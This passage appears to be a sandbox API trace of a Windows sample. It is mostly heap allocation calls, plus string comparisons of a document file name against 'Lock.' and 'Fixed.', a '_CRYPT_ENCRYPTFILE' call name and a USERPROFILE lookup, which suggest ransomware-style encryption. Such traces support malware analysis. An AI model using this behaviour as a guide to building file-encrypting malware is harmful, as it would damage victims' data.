RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0268.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0268.342] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ypyYdQHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.342] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pyYdQHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yYdQHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YdQHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QHgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HgVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gVdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dPHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PHUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HUEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEe.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ee.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0268.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0268.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.343] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0268.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0268.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x977b18 [0268.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ypyYdQHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pyYdQHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yYdQHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YdQHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QHgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HgVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gVdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VdPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dPHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PHUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HUEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEe.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ee.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.345] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.345] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0268.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.346] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.346] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, 